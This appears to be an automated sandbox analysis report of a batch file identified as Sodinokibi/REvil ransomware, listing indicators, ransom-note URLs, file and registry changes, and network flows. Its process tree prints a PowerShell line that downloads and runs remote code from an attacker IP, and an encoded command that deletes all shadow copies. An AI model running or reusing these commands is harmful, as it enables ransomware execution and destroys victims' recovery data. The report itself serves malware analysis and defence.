Analysis
- max time kernel: 149s
- max time network: 168s
- platform: windows7_x64
- resource: win7v200430
- submitted: 06-05-2020 04:10

Static task: static1
Behavioral task: behavioral1
- Sample: XxNTGzKz.bat
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: XxNTGzKz.bat
- Resource: win10v200430
General
- Target: XxNTGzKz.bat
- Size: 190B
- MD5: 3678f90ffe3dce18e97095fe049f6cc7
- SHA1: 8e8d141ad77c44b2c8b835eacd67b039f0ee62e8
- SHA256: 3a7e391aaff6e03154e366b5df819a3d550d260df5a13e107f691b57c4811f4d
- SHA512: 1466e273b77eb1b62b58b5c39798c9a8a2ac44a1acdd3d893e2768b8a34ff4c0815004c8ab497fca8e40a6b1f65c9a6a2df4b19bdece5bf3ee9471a18b893716
Malware Config
- Extracted from: http://185.103.242.78/pastes/XxNTGzKz
- Extracted from: C:\prd6f4zrw-read-me.txt
- Family: sodinokibi
- Ransom note URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/163FDCBB382B4032
  - http://decryptor.cc/163FDCBB382B4032
Signatures

Drops file in Program Files directory (22 IoCs)
Processes: powershell.exe
- File created: \??\c:\program files\microsoft sql server compact edition\prd6f4zrw-read-me.txt (powershell.exe)
- File opened for modification: \??\c:\program files\RepairUninstall.doc (powershell.exe)
- File opened for modification: \??\c:\program files\SelectBackup.wma (powershell.exe)
- File opened for modification: \??\c:\program files\SkipStart.ex_ (powershell.exe)
- File opened for modification: \??\c:\program files\UseDebug.asp (powershell.exe)
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\prd6f4zrw-read-me.txt (powershell.exe)
- File created: \??\c:\program files\prd6f4zrw-read-me.txt (powershell.exe)
- File created: \??\c:\program files (x86)\prd6f4zrw-read-me.txt (powershell.exe)
- File opened for modification: \??\c:\program files\ConnectInvoke.otf (powershell.exe)
- File opened for modification: \??\c:\program files\NewLock.m4a (powershell.exe)
- File opened for modification: \??\c:\program files\OptimizeUninstall.vsdx (powershell.exe)
- File opened for modification: \??\c:\program files\ResumeUnregister.jfif (powershell.exe)
- File opened for modification: \??\c:\program files\SetWatch.mpeg (powershell.exe)
- File opened for modification: \??\c:\program files\WaitMove.rmi (powershell.exe)
- File opened for modification: \??\c:\program files\SuspendLock.mp2 (powershell.exe)
- File opened for modification: \??\c:\program files\TraceRemove.png (powershell.exe)
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\prd6f4zrw-read-me.txt (powershell.exe)
- File opened for modification: \??\c:\program files\ConnectRevoke.pps (powershell.exe)
- File opened for modification: \??\c:\program files\DisableRedo.asp (powershell.exe)
- File opened for modification: \??\c:\program files\MeasureDisable.otf (powershell.exe)
- File opened for modification: \??\c:\program files\RestartExit.mp4v (powershell.exe)
- File opened for modification: \??\c:\program files\WatchShow.midi (powershell.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\az5wlch5i7.bmp" (powershell.exe)
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
- PID 1388 (cmd.exe) wrote to memory of PID 1472 (powershell.exe)
- PID 1472 (powershell.exe) wrote to memory of PID 532 (powershell.exe)
- PID 1472 (powershell.exe) wrote to memory of PID 532 (powershell.exe)
- PID 1472 (powershell.exe) wrote to memory of PID 532 (powershell.exe)
- PID 1472 (powershell.exe) wrote to memory of PID 532 (powershell.exe)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
- Token: SeDebugPrivilege, PID 1472 (powershell.exe)
- Token: SeDebugPrivilege, PID 1472 (powershell.exe)
- Token: SeDebugPrivilege, PID 532 (powershell.exe)
- Token: SeBackupPrivilege, PID 1332 (vssvc.exe)
- Token: SeRestorePrivilege, PID 1332 (vssvc.exe)
- Token: SeAuditPrivilege, PID 1332 (vssvc.exe)
- Token: SeTakeOwnershipPrivilege, PID 1472 (powershell.exe)
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
- PID 1472 (powershell.exe)
- PID 1472 (powershell.exe)
- PID 1472 (powershell.exe)
- PID 532 (powershell.exe)
- PID 532 (powershell.exe)
Blacklisted process makes network request (60 IoCs)
Processes: powershell.exe
- All 60 flows originate from PID 1472 (powershell.exe); flow IDs: 4, 6, 8, 10, 12, 14, 16, 18, 20, 21, 23, 24, 26, 28, 29, 31, 33, 35, 37, 40, 41, 43, 45, 47, 48, 51, 53, 55, 57, 58, 60, 61, 63, 64, 66, 68, 69, 71, 72, 74, 76, 77, 79, 80, 82, 84, 86, 87, 89, 91, 92, 94, 95, 97, 99, 100, 102, 104, 105, 107
Makes http(s) request (20 IoCs)
Contacts server via http/https, possibly for C2 communication.
Processes: (flow, HTTP URL)
- flow 31: https://cheminpsy.fr/content/pics/duacxkjf.png
- flow 51: https://stoeferlehalle.de/uploads/pictures/zxev.png
- flow 89: https://homecomingstudio.com/static/graphic/juetak.gif
- flow 12: http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
- flow 18: https://smejump.co.th/news/graphic/rpyaztgfrlviysgf.jpg
- flow 33: https://hannah-fink.de/admin/tmp/ulzt.png
- flow 43: https://educar.org/static/game/mtpbwcwipwtkwjzqdo.gif
- flow 8: https://jenniferandersonwriter.com/news/image/lzol.gif
- flow 16: https://olejack.ru/news/tmp/pxysshaktzzchm.gif
- flow 20: https://berliner-versicherungsvergleich.de/content/tmp/hiew.gif
- flow 35: https://hhcourier.com/news/tmp/ivtfjt.jpg
- flow 45: https://www.educar.org/
- flow 74: https://fiscalsort.com/static/tmp/powerpda.jpg
- flow 97: https://shhealthlaw.com/include/image/syzfdnvluvuzvrbu.gif
- flow 4: http://185.103.242.78/pastes/XxNTGzKz
- flow 10: http://apps.identrust.com/roots/dstrootcax3.p7c
- flow 14: https://anteniti.com/include/images/jlukbh.gif
- flow 21: https://berliner-versicherungsvergleich.de/login/
- flow 55: https://elpa.se/wp-content/graphic/qvvktgvanyfhvm.jpg
- flow 66: https://braffinjurylawfirm.com/news/temp/fm.jpg
Enumerates connected drives (3 TTPs)
Drops file in System32 directory (1 IoC)
Processes: powershell.exe
- File opened for modification: C:\Windows\System32\CatRoot2\dberr.txt (powershell.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
- PID 1472 (powershell.exe)
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
Modifies system certificate store (4 IoCs)
Processes: powershell.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 (powershell.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 (powershell.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 (powershell.exe)
- Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 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 (powershell.exe)
Processes (process tree; indentation shows parent/child relationship)

- C:\Windows\system32\cmd.exe (PID 1388)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\XxNTGzKz.bat"
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1472)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/XxNTGzKz');Invoke-HDELSZM;Start-Sleep -s 10000"
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in System32 directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Modifies system certificate store

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 532)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} )
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

- C:\Windows\system32\vssvc.exe (PID 1332)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service